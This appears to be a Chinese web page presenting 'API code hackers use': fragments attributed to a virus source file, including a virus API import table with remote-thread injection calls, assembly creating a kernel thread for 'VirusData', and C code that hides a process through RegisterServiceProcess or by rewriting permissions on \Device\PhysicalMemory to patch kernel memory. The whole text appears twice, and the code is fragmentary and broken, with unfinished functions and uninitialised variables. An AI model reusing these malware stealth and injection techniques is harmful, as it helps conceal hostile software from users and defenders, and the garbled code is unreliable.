f看看黑客用的API代码
搜索:分析,病毒,黑客,程序,源代码
file:pudn.com/downloads38/sourcecode/virus/127984/WAP32.ASM
;Kernel32.DLL
KnlLoadLibraryA
KnlCreateMutexA
KnlGetLastError
KnlGetCommandLineA
KnlWinExec
KnlGetDriveTypeA
KnlSetCurrentDirectoryA
KnlFindFirstFileA
KnlFindNextFileA
KnlFindClose
KnlSetFileAttributesA
KnlSetFileTime
KnlLOpen
KnlLRead
KnlLWrite
KnlLSeek
KnlLClose
KnlSleep
KnlRegisterServiceProc
KnlGetCurrentProcessId
KnlOpenProcess
KnlWriteProcessMemory
KnlCreateRemoteThread
KnlCreateKernelThread
KnlCloseHandle
KnlWaitForSingleObject
KnlVirtualAllocEx
KnlGetSystemDirectoryA
KnlLCreat
KnlCreateThread
KnlTerminateThread
KnlWideCharToMultiByte
KnlGetComputerNameA
KnlGetSystemTime
LoopRelocKnlApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp // ;Kernel32.dll Api
loop LoopRelocKnlApi
mov eax,[esp.KnlLoadLibraryA]
call PushUser32Str
db 'USER32.DLL',0
KnlLoadLibraryA // ;Kernel32.dll Api
call [esi.KnlGetCurrentProcessId] // ;Kernel32.dll Api
push eax
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp // ;Kernel32.dll Api
mov [esi.DataRemoteThread],eax // ;VirusData
pop eax
call [esi.KnlSleep],500 // ;Kernel32.dll Api
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
IsWindows9x(void):
if (GetVersion() < 0x80000000) //NT/2000/XP
return false;
else //9x/ME
return true;
//以上判定9x/ME系统
//隐藏处理
Hide98Process(void):
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
lpRegisterServiceProcess=(LPREGISTERSERVICEPROCESS)
GetProcAddress(hDLL,"RegisterServiceProcess");
lpRegisterServiceProcess(GetCurrentProcessId(),1);
FreeLibrary(hDLL);
OpenPhysicalMemory():
{ // 实现读写内存文件
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&g_osvi);
if (5 != g_osvi.dwMajorVersion) return NULL;
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}
//以上判定NT系统Ver
//初始化 physmemString 标准设备\\Device\\PhysicalMemory
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
//改写内存Section操纵NTFS的文件权限:GetNamedSecurityInfo, SetNamedSecurityInfo,GetSecurityInfo, SetSecurityInfo
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
//使用MapViewOfFile来获取共享的内存地址,可以使用OpenFileMapping函数在另一个进程里打开共享文件
return g_hMPM;
}
InitNTDLL():
{
g_hNtDLL = LoadLibrary("ntdll.dll");
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
}
YHideProcess():
// SetUnhandledExceptionFilter(exeception);
InitNTDLL();
OpenPhysicalMemory();
CloseHandle(g_hMPM);
CloseNTDLL();
}
GetData(PVOID addr)
{
ULONG phys;
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
}
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys;
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
}
HideProcess();
bool bFound;
HANDLE hMutexOneInstantance=CreateMutex(NULL,TRUE,_T("cyh")); //建立互斥
if(GetLastError()==ERROR_ALREADY_EXISTS) bFound=TRUE; //仅一个进程实例
if(hMutexOneInstantance) ReleaseMutex(hMutexOneInstantance);
搜索:分析,病毒,黑客,程序,源代码
file:pudn.com/downloads38/sourcecode/virus/127984/WAP32.ASM
;Kernel32.DLL
KnlLoadLibraryA
KnlCreateMutexA
KnlGetLastError
KnlGetCommandLineA
KnlWinExec
KnlGetDriveTypeA
KnlSetCurrentDirectoryA
KnlFindFirstFileA
KnlFindNextFileA
KnlFindClose
KnlSetFileAttributesA
KnlSetFileTime
KnlLOpen
KnlLRead
KnlLWrite
KnlLSeek
KnlLClose
KnlSleep
KnlRegisterServiceProc
KnlGetCurrentProcessId
KnlOpenProcess
KnlWriteProcessMemory
KnlCreateRemoteThread
KnlCreateKernelThread
KnlCloseHandle
KnlWaitForSingleObject
KnlVirtualAllocEx
KnlGetSystemDirectoryA
KnlLCreat
KnlCreateThread
KnlTerminateThread
KnlWideCharToMultiByte
KnlGetComputerNameA
KnlGetSystemTime
LoopRelocKnlApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp // ;Kernel32.dll Api
loop LoopRelocKnlApi
mov eax,[esp.KnlLoadLibraryA]
call PushUser32Str
db 'USER32.DLL',0
KnlLoadLibraryA // ;Kernel32.dll Api
call [esi.KnlGetCurrentProcessId] // ;Kernel32.dll Api
push eax
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp // ;Kernel32.dll Api
mov [esi.DataRemoteThread],eax // ;VirusData
pop eax
call [esi.KnlSleep],500 // ;Kernel32.dll Api
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
IsWindows9x(void):
if (GetVersion() < 0x80000000) //NT/2000/XP
return false;
else //9x/ME
return true;
//以上判定9x/ME系统
//隐藏处理
Hide98Process(void):
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
lpRegisterServiceProcess=(LPREGISTERSERVICEPROCESS)
GetProcAddress(hDLL,"RegisterServiceProcess");
lpRegisterServiceProcess(GetCurrentProcessId(),1);
FreeLibrary(hDLL);
OpenPhysicalMemory():
{ // 实现读写内存文件
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&g_osvi);
if (5 != g_osvi.dwMajorVersion) return NULL;
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}
//以上判定NT系统Ver
//初始化 physmemString 标准设备\\Device\\PhysicalMemory
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
//改写内存Section操纵NTFS的文件权限:GetNamedSecurityInfo, SetNamedSecurityInfo,GetSecurityInfo, SetSecurityInfo
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
//使用MapViewOfFile来获取共享的内存地址,可以使用OpenFileMapping函数在另一个进程里打开共享文件
return g_hMPM;
}
InitNTDLL():
{
g_hNtDLL = LoadLibrary("ntdll.dll");
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
}
YHideProcess():
// SetUnhandledExceptionFilter(exeception);
InitNTDLL();
OpenPhysicalMemory();
CloseHandle(g_hMPM);
CloseNTDLL();
}
GetData(PVOID addr)
{
ULONG phys;
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
}
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys;
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
}
HideProcess();
bool bFound;
HANDLE hMutexOneInstantance=CreateMutex(NULL,TRUE,_T("cyh")); //建立互斥
if(GetLastError()==ERROR_ALREADY_EXISTS) bFound=TRUE; //仅一个进程实例
if(hMutexOneInstantance) ReleaseMutex(hMutexOneInstantance);